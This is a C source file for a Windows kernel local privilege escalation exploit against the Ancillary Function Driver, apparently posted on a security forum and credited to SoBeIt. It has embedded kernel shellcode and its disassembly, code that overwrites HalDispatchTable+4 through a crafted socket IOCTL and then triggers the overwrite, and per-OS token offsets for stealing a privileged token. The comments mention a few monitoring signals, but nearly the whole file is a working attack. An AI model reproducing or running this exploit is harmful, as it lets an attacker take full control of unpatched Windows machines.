// Thanks to SoBeIt
// Original URL: http://www.whitecell.org/forums/viewthread.php?tid=796
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
/* Locally declared NT-native types and prototypes (not taken from SDK headers).
 * Layouts are the 32-bit ones; every pointer/ULONG cast in this file assumes
 * sizeof(PVOID) == sizeof(ULONG). */
#define NTSTATUS int

/* Filled by ZwQueryInformationProcess(ProcessBasicInformation) in main();
 * only InheritedFromUniqueProcessId (the parent PID) is read afterwards. */
typedef struct _PROCESS_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    PVOID PebBaseAddress;
    ULONG AffinityMask;
    ULONG BasePriority;
    ULONG UniqueProcessId;
    ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;

/* One 16-bit entry of a PE base-relocation block: 12-bit page offset, 4-bit type.
 * Used by GetServiceTable. */
typedef struct _IMAGE_FIXUP_ENTRY {
    USHORT Offset:12;
    USHORT Type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

/* Tag spelling "IMFORMATION" is as in the original. Only ProcessBasicInformation
 * is referenced in this file. */
typedef enum _PROCESS_IMFORMATION_CLASS {
    ProcessBasicInformation,
    ProcessQuotaLimits,
    ProcessIoCounters,
    ProcessVmCounters,
    ProcessTimes,
    ProcessBasePriority,
    ProcessRaisePriority,
    ProcessDebugPort,
    ProcessExceptionPort,
    ProcessAccessToken,
    ProcessLdtInformation,
    ProcessLdtSize,
    ProcessDeaultHardErrorMode,
    ProcessIoPortHandlers,
    ProcessPooledUsageAndLimits,
    ProcessWorkingSetWatch,
    ProcessUserModeIOPL,
    ProcessEnableAlignmentFaultFixup,
    ProcessPriorityClass,
    ProcessWx86Information,
    ProcessHandleCount,
    ProcessAffinityMask,
    ProcessPriorityBoost,
    ProcessDeviceMap,
    ProcessSessionInformation,
    ProcessForegroundInformation,
    ProcessWow64Information
} PROCESS_INFORMATION_CLASS;

/* Only SystemModuleInformation (value 11) is used, by GetKernelBase. */
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemNotImplemented1,
    SystemProcessesAndThreadsInformation,
    SystemCallCounts,
    SystemConfigurationInformation,
    SystemProcessorTimes,
    SystemGlobalFlag,
    SystemNotImplemented2,
    SystemModuleInformation,
    SystemLockInformation,
    SystemNotImplemented3,
    SystemNotImplemented4,
    SystemNotImplemented5,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPagefileInformation,
    SystemInstructioEmulationCounts,
    SystemInvalidInfoClass1,
    SystemCacheInformation,
    SystemPoolTagInformation,
    SystemProcessorStatistics,
    SystemDpcInformation,
    SystemNotImplemented6,
    SystemLoadImage,
    SystemUnloadImage,
    SystemTimeAdjustment,
    SystemNotImplemented7,
    SystemNotImplemented8,
    SystemNotImplemented9,
    SystemCrashDumpInformation,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegisterQuotaInformation,
    SystemLoadAndCallImage,
    SystemPrioritySeparation
} SYSTEM_INFORMATION_CLASS;

/* Profile source argument for ZwQueryIntervalProfile; main() passes ProfileTotalIssues. */
typedef enum _KPROFILE_SOURCE {
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

/* Declared but not referenced anywhere in this file. */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

/* Declared (and a local of this type exists in main) but never used. */
typedef struct _SECTION_BASIC_INFORMATION {
    PVOID BaseAddress;
    ULONG Attributes;
    LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

/* One entry of the SystemModuleInformation list; the list is prefixed by a
 * ULONG entry count. GetKernelBase reads Base and ImageName. */
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

/* Function-pointer types for the ntdll exports resolved in GetFunction().
 * ZWQUERYINTERNALPROFILE is a misspelling: it is bound to ZwQueryIntervalProfile. */
typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG);
typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);

/* Populated by GetFunction(); NULL (zero-initialised globals) until it runs. */
ZWQUERYINTERNALPROFILE ZwQueryIntervalProfile;
ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
RTLIMAGENTHEADER RtlImageNtHeader;
RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;
/* Kernel export names that main() hashes with ComputeHash and writes into the
 * payload's parameter block. The empty string terminates the list. Element
 * type is unsigned char, so each row is passed to ComputeHash(char *) with a
 * pointer-signedness mismatch (a warning on most compilers). */
unsigned char kfunctions[64][64] = {
    //ntoskrnl.exe
    {"ZwTerminateProcess"},
    {"PsLookupProcessByProcessId"},
    {""},
};
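/* Kernel-mode payload bytes; a disassembly is in the comment at the end of
 * this file. main() searches this array dword-by-dword for the marker
 * 0x90cccc90 (bytes 90 cc cc 90) and copies its parameter block (export-name
 * hashes followed by per-OS constants) into the bytes that follow the marker,
 * then copies the whole array (minus the trailing NUL) to address 0x8000. */
unsigned char shellcode[] =
"\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
"\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\x64\x8b\x35"
"\x38\x00\x00\x00\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
"\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
"\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
"\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
"\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
"\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
"\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
"\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
"\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
"\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
"\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
"\xff\x90\x90\x90"
"\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";

/* Print pMsg followed by the thread's last Win32 error code and terminate the
 * process. pMsg is a NUL-terminated string; the parameter was previously left
 * with an implicit int type and printed through %s, which is undefined. The
 * exit code stays 0 as before. GetLastError() returns a DWORD, hence %lu. */
void ErrorQuit(const char *pMsg)
{
    printf("%sError Code:%lu\n", pMsg, (unsigned long)GetLastError());
    ExitProcess(0);
}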
/* 32-bit rolling hash of a NUL-terminated name: rotate the running value
 * left by 25 bits, then add the next character. Because *ch is a plain char,
 * bytes >= 0x80 contribute a sign-extended value on compilers where char is
 * signed. Returns 0 for the empty string. main() uses this to turn the
 * kfunctions entries into the values the payload compares against. */
ULONG ComputeHash(char *ch)
{
    ULONG h = 0;
    const char *p = ch;
    for (; *p != '\0'; p++) {
        ULONG rotated = (h << 25) | (h >> 7);
        h = rotated + (ULONG)*p;
    }
    return h;
}
/* Resolve one export from hModule, or terminate through ErrorQuit(failMsg). */
static FARPROC ResolveOrQuit(HANDLE hModule, const char *name, const char *failMsg)
{
    FARPROC fn = GetProcAddress(hModule, name);
    if (fn == NULL) {
        ErrorQuit(failMsg);
    }
    return fn;
}

/* Fill in the ntdll function-pointer globals: ZwQueryIntervalProfile,
 * ZwQueryInformationProcess, ZwQuerySystemInformation,
 * ZwAllocateVirtualMemory, RtlImageNtHeader and RtlImageDirectoryEntryToData.
 * Any lookup failure exits the process via ErrorQuit. The LoadLibrary
 * reference is dropped with FreeLibrary before returning; the resolved
 * pointers are still used afterwards, which only works because ntdll is
 * never actually unmapped from a running process. */
void GetFunction()
{
    HANDLE hNtdll = LoadLibrary("ntdll.dll");
    if (hNtdll == NULL) {
        ErrorQuit("LoadLibrary failed.\n");
    }

    ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)ResolveOrQuit(hNtdll, "ZwQueryIntervalProfile", "GetProcAddress failed.\n");
    ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)ResolveOrQuit(hNtdll, "ZwQueryInformationProcess", "GetProcAddress failed.\n");
    /* This one reports "GetProcessAddress" rather than "GetProcAddress"; message kept as-is. */
    ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)ResolveOrQuit(hNtdll, "ZwQuerySystemInformation", "GetProcessAddress failed.\n");
    ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)ResolveOrQuit(hNtdll, "ZwAllocateVirtualMemory", "GetProcAddress failed.\n");
    RtlImageNtHeader = (RTLIMAGENTHEADER)ResolveOrQuit(hNtdll, "RtlImageNtHeader", "GetProcAddress failed.\n");
    RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)ResolveOrQuit(hNtdll, "RtlImageDirectoryEntryToData", "GetProcAddress failed.\n");

    FreeLibrary(hNtdll);
}
/* Locate the kernel image in the SystemModuleInformation list.
 * Walks the module entries returned by ZwQuerySystemInformation and, at the
 * first entry whose ImageName contains "ntoskrnl.exe" or "ntkrnlpa.exe",
 * prints that name, copies the matched file name into KernelName (the caller
 * must provide room for 13 bytes) and returns the entry's Base. Returns 0 if
 * no entry matches. Exits through ErrorQuit when malloc or the sized query
 * fails; the status of the initial size probe is not checked. */
ULONG GetKernelBase(char *KernelName)
{
    static const char *const kernelNames[] = { "ntoskrnl.exe", "ntkrnlpa.exe" };
    ULONG needed, count, m;
    size_t n;
    PVOID list;
    PSYSTEM_MODULE_INFORMATION entry;

    /* Size probe: a zero-length query that only reports the required length. */
    ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&needed, 0, &needed);
    list = malloc(needed);
    if (list == NULL) {
        ErrorQuit("malloc failed.\n");
    }
    if (ZwQuerySystemInformation(SystemModuleInformation, list, needed, &needed)) {
        ErrorQuit("ZwQuerySystemInformation failed\n");
    }

    /* Buffer layout: ULONG count, then count SYSTEM_MODULE_INFORMATION entries. */
    count = *(PULONG)list;
    entry = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)list + sizeof(ULONG));
    for (m = 0; m < count; m++, entry++) {
        for (n = 0; n < sizeof kernelNames / sizeof kernelNames[0]; n++) {
            if (strstr(entry->ImageName, kernelNames[n]) != NULL) {
                ULONG base = (ULONG)entry->Base;
                printf("Kernel is %s\n", entry->ImageName);
                free(list);
                strcpy(KernelName, kernelNames[n]);
                return base;
            }
        }
    }

    free(list);
    return 0;
}
/* Scan pImageBase's base-relocation directory for the HIGHLOW fixup whose
 * relocated target equals Address. When one is found and the two bytes just
 * before it are 0x05c7 (presumably the C7 05 encoding of a
 * `mov dword ptr [disp32], imm32`), return the dword four bytes past the
 * fixup, rebased to an RVA. Returns 0 when the image has no relocation
 * directory or nothing matches. Requires RtlImageNtHeader and
 * RtlImageDirectoryEntryToData to have been resolved by GetFunction().
 * Not referenced from main() in this file. All pointer arithmetic goes
 * through ULONG, so this is 32-bit only. */
ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
{
    PIMAGE_NT_HEADERS pNtHeaders;
    PIMAGE_BASE_RELOCATION pBaseRelocation;
    PIMAGE_FIXUP_ENTRY pFixupEntry;
    ULONG RelocationTableSize = 0;
    ULONG Offset, i, VirtualAddress, Rva;

    Offset = Address - (ULONG)pImageBase;  // RVA of the address being searched for
    pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
    pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
    if(pBaseRelocation == NULL) return 0;
    do {
        pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
        /* The directory size obtained above is overwritten here by the
         * per-block entry count, so the outer walk is bounded only by the
         * zero-VirtualAddress terminator tested at the bottom of the loop. */
        RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
        for(i = 0; i < RelocationTableSize; i++, pFixupEntry++) {
            if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW) {
                VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
                // Value stored at the fixup, converted from preferred-base VA to RVA.
                Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
                if(Rva == Offset) {
                    if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
                        return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
                }
            }
        }
        /* Advances the block pointer through an integer alias of the pointer
         * variable (a strict-aliasing violation; relies on 32-bit pointers). */
        *(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;
    } while(pBaseRelocation->VirtualAddress);
    return 0;
}
/* Entry point. Flow, in order: resolve ntdll natives (GetFunction), read the
 * parent PID from the process's basic information, locate the kernel image,
 * select per-OS constants from the minor version, derive the kernel-space
 * address of HalDispatchTable+4 from a user-mode LoadLibrary of the kernel
 * file, map an RWX region at a low address and copy the payload to 0x8000,
 * connect over loopback to TCP port 445 and issue IOCTL 0x1203F on the socket
 * handle with a kernel address as its output buffer, then call
 * ZwQueryIntervalProfile, whose dispatch goes through HalDispatchTable+4.
 * From a monitoring standpoint the distinguishing events are the RWX
 * allocation below 64 KB, a DeviceIoControl on a socket handle whose output
 * pointer lies in kernel address range, and the loopback connect to 445.
 * Takes no arguments; returns 1 on every path that does not terminate
 * through ErrorQuit. */
int main(int argc, char* argv[])
{
    /* Many of these locals are never used: pDrivers, pOldKernelInfo,
     * pMapAddress, pBase, FunctionAddress, smi, sbi, DriverName, Byte, len,
     * i, BaseAddress, Value, Sections, Pid, FunctionNumber. pFakeKernelInfo
     * is allocated below and then neither used nor freed. */
    PVOID pDrivers[256];
    PVOID pOldKernelInfo, pMapAddress = NULL;
    PULONG pStoreBuffer, pShellcode, pFakeKernelInfo;
    PUCHAR pRestoreBuffer, pBase, FunctionAddress;
    PROCESS_BASIC_INFORMATION pbi;
    SYSTEM_MODULE_INFORMATION smi;
    SECTION_BASIC_INFORMATION sbi;
    KPROFILE_SOURCE ProfileSource;
    OSVERSIONINFO ovi;
    char DriverName[256], KernelName[64];
    ULONG Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
    ULONG HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
    ULONG HDTOffset, AllocationSize;
    ULONG Result;
    HANDLE hKernel;
    WSADATA wsad;
    int sockfd;
    struct sockaddr_in saddr;

    printf("\n MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit \n\n");
    printf("\t Create by SoBeIt. \n\n");
    if(argc != 1) {
        printf(" Usage:%s\n\n", argv[0]);
        return 1;
    }
    pFakeKernelInfo = (PULONG)malloc(256);
    GetFunction();

    // Parent PID (pbi.InheritedFromUniqueProcessId) is later placed in the payload's parameter block.
    if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL)) ErrorQuit("ZwQueryInformationProcess failed\n");

    KernelBase = GetKernelBase(KernelName);
    if(!KernelBase) ErrorQuit("Unable to get kernel base address.\n");
    printf("Kernel base address: %x\n", KernelBase);
    ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if(!GetVersionEx(&ovi)) ErrorQuit("GetVersionEx failed.\n");
    if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6) ErrorQuit("Not Windows NT family OS.\n");
    printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
    /* Per-OS constants handed to the payload via buf[] below. The switch keys
     * on dwMinorVersion alone; dwMajorVersion is only range-checked above.
     * TokenOffset is presumably an EPROCESS field offset — inferred from the
     * name, not established by this file. */
    switch(ovi.dwMinorVersion) {
    case 0: //Windows2000
        SystemId = 8; TokenOffset = 0x12c; break;
    case 1: //WindowsXP
        SystemId = 4; TokenOffset = 0xc8; break;
    case 2: //Windows2003
        SystemId = 4; TokenOffset = 0xd8; break;
    default:
        SystemId = 4; TokenOffset = 0xc8;
    }
    // The kernel file is loaded as an ordinary user-mode image purely to look up an export.
    hKernel = LoadLibrary(KernelName);
    if(hKernel == NULL) ErrorQuit("LoadLibrary failed.\n");

    printf("Load Base:%x\n", (ULONG)hKernel);
    // Despite the name, HDTOffset ends up as the kernel-space address of HalDispatchTable
    // (user-mode export address rebased by the difference between the two load bases).
    HDTOffset = (ULONG)GetProcAddress(hKernel, "HalDispatchTable");
    HDTOffset += KernelBase - (ULONG)hKernel;
    printf("HalDispatchTable Offset:%x\n", HDTOffset);
    HookAddress = (ULONG)(HDTOffset + 4);
    printf("NtQueryIntervalProfile function entry address:%x\n", HookAddress);
    /* RWX mapping requested at 0x7fb0 in the current process ((HANDLE)-1 is
     * the current-process pseudo-handle); ZwAllocateVirtualMemory rewrites
     * pStoreBuffer and AllocationSize to the rounded region actually mapped.
     * Later Windows releases refuse user-mode allocations in the lowest 64 KB. */
    AllocationSize = 0x1000;
    pStoreBuffer = (PULONG)0x7fb0;
    if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE)) ErrorQuit("ZwAllocateVirtualMemory failed.\n");
    pRestoreBuffer = malloc(0x100);  // address is passed to the payload in buf[]; never freed

    memset(pStoreBuffer, 0x90, AllocationSize);
    pShellcode = (PULONG)shellcode;
    // Dword-granular scan for the 0x90cccc90 marker; k ends up indexing the dword just past it.
    for(k = 0; pShellcode[k++] != 0x90cccc90; ) ;

    // Hash each kfunctions name (unsigned char rows passed as char *); loop stops at the "" sentinel.
    for(j = 0; kfunctions[j][0] != '\x0'; j++) buf[j] = ComputeHash(kfunctions[j]);

    /* Parameter block appended after the hashes: parent PID, SystemId,
     * pRestoreBuffer, HookAddress, the constant 4 (meaning not evident from
     * this file), TokenOffset. It is patched into the global shellcode array
     * in place, and the whole array (minus its NUL) is then copied to the
     * literal address 0x8000 — not to the pStoreBuffer returned above. */
    buf[j++] = pbi.InheritedFromUniqueProcessId;
    buf[j++] = SystemId;
    buf[j++] = (ULONG)pRestoreBuffer;
    buf[j++] = HookAddress;
    buf[j++] = 0x04;
    buf[j++] = TokenOffset;
    memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
    memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);

    if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0) ErrorQuit("WSAStartup failed.\n");

    // SOCKET is unsigned on Windows; storing it in an int turns INVALID_SOCKET into -1 for this check.
    if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) ErrorQuit("socket failed.\n");

    // 0x1bd = port 445; 0x100007f is 127.0.0.1 already in network byte order.
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(0x1bd);
    saddr.sin_addr.s_addr = 0x100007f;
    if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr))) ErrorQuit("connect failed.\n");
    /* IOCTL on the socket handle with a zero-length output buffer whose
     * pointer is a kernel address (HookAddress - 3). The return value is not
     * checked; Result only receives the bytes-returned count. */
    DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);
    // Per the printf above, this call dispatches through HalDispatchTable+4.
    ProfileSource = ProfileTotalIssues;
    ZwQueryIntervalProfile(ProfileSource, &Result);

    printf("Exploit finished.\n");
    return 1;  // same exit status as the usage error above
}
/*Comment by friddy shellcode ASM: 00422330 90 nop 00422331 60 pushad 00422332 9C pushfd 00422333 E9 C4 00 00 00 jmp friddy+0CCh (004223fc) 00422338 5F pop edi 00422339 4F dec edi 0042233A 47 inc edi 0042233B 66 81 3F 90 CC cmp word ptr [edi],offset friddy+0Eh (0042233e) 00422340 75 F8 jne friddy+0Ah (0042233a) 00422342 66 81 7F 02 CC 90 cmp word ptr [edi+2],offset friddy+16h (00422346) 00422348 75 F0 jne friddy+0Ah (0042233a) 0042234A 83 C7 04 add edi,4 0042234D 64 8B 35 38 00 00 00 mov esi,dword ptr fs:[38h] 00422354 AD lods dword ptr [esi] 00422355 AD lods dword ptr [esi] 00422356 48 dec eax 00422357 81 38 4D 5A 90 00 cmp dword ptr [eax],905A4Dh 0042235D 75 F7 jne friddy+26h (00422356) 0042235F 95 xchg eax,ebp 00422360 8B F7 mov esi,edi 00422362 6A 02 push 2 00422364 59 pop ecx 00422365 E8 4D 00 00 00 call friddy+87h (004223b7) 0042236A E2 F9 loop friddy+35h (00422365) 0042236C 8B 4E 0C mov ecx,dword ptr [esi+0Ch] 0042236F E8 29 00 00 00 call friddy+6Dh (0042239d) 00422374 50 push eax 00422375 8B 4E 08 mov ecx,dword ptr [esi+8] 00422378 E8 20 00 00 00 call friddy+6Dh (0042239d) 0042237D 5A pop edx 0042237E 8B 7E 1C mov edi,dword ptr [esi+1Ch] 00422381 8B 0C 3A mov ecx,dword ptr [edx+edi] 00422384 89 0C 38 mov dword ptr [eax+edi],ecx 00422387 56 push esi 00422388 8B 7E 14 mov edi,dword ptr [esi+14h] 0042238B 8B 4E 18 mov ecx,dword ptr [esi+18h] 0042238E 8B 76 10 mov esi,dword ptr [esi+10h] 00422391 F3 A4 rep movs byte ptr [edi],byte ptr [esi] 00422393 5E pop esi 00422394 33 C0 xor eax,eax 00422396 50 push eax 00422397 50 push eax 00422398 FF 16 call dword ptr [esi] 0042239A 9D popfd 0042239B 61 popad 0042239C C3 ret 0042239D 83 EC 04 sub esp,4 004223A0 8D 2C 24 lea ebp,[esp] 004223A3 55 push ebp 004223A4 51 push ecx 004223A5 FF 56 04 call dword ptr [esi+4] 004223A8 85 C0 test eax,eax 004223AA 0F 85 80 8F 00 00 jne 0042B330 004223B0 8B 45 00 mov eax,dword ptr [ebp] 004223B3 83 C4 04 add esp,4 004223B6 C3 ret 004223B7 51 push ecx 004223B8 56 push esi 004223B9 8B 75 
3C mov esi,dword ptr [ebp+3Ch] 004223BC 8B 74 2E 78 mov esi,dword ptr [esi+ebp+78h] 004223C0 03 F5 add esi,ebp 004223C2 56 push esi 004223C3 8B 76 20 mov esi,dword ptr [esi+20h] 004223C6 03 F5 add esi,ebp 004223C8 33 C9 xor ecx,ecx 004223CA 49 dec ecx 004223CB 41 inc ecx 004223CC AD lods dword ptr [esi] 004223CD 03 C5 add eax,ebp 004223CF 33 DB xor ebx,ebx 004223D1 0F BE 10 movsx edx,byte ptr [eax] 004223D4 85 D2 test edx,edx 004223D6 74 08 je friddy+0B0h (004223e0) 004223D8 C1 CB 07 ror ebx,7 004223DB 03 DA add ebx,edx 004223DD 40 inc eax 004223DE EB F1 jmp friddy+0A1h (004223d1) 004223E0 3B 1F cmp ebx,dword ptr [edi] 004223E2 75 E7 jne friddy+9Bh (004223cb) 004223E4 5E pop esi 004223E5 8B 5E 24 mov ebx,dword ptr [esi+24h] 004223E8 03 DD add ebx,ebp 004223EA 66 8B 0C 4B mov cx,word ptr [ebx+ecx*2] 004223EE 8B 5E 1C mov ebx,dword ptr [esi+1Ch] 004223F1 03 DD add ebx,ebp 004223F3 8B 04 8B mov eax,dword ptr [ebx+ecx*4] 004223F6 03 C5 add eax,ebp 004223F8 AB stos dword ptr [edi] 004223F9 5E pop esi 004223FA 59 pop ecx 004223FB C3 ret 004223FC E8 37 FF FF FF call friddy+8 (00422338) 00422401 90 nop 00422402 90 nop 00422403 90 nop 00422404 90 nop 00422405 CC int 3 00422406 CC int 3 00422407 90 nop 00422408 90 nop 00422409 90 nop 0042240A 90 nop 0042240B 90 nop 0042240C 90 nop 0042240D 90 nop 0042240E 90 nop 0042240F 90 nop 00422410 90 nop 00422411 90 nop 00422412 90 nop 00422413 90 nop 00422414 90 nop 00422415 90 nop 00422416 90 nop 00422417 90 nop 00422418 90 nop 00422419 90 nop 0042241A 90 nop 0042241B 90 nop 0042241C 90 nop 0042241D 90 nop 0042241E 90 nop 0042241F 90 nop 00422420 90 nop 00422421 90 nop 00422422 90 nop 00422423 90 nop 00422424 90 nop 00422425 90 nop 00422426 90 nop 00422427 90 nop 00422428 90 nop 00422429 90 nop 0042242A 90 nop 0042242B 90 nop 0042242C 90 nop 0042242D 90 nop 0042242E 90 nop 0042242F 90 nop 00422430 CC int 3 00422431 90 nop 00422432 90 nop 00422433 CC int 3 */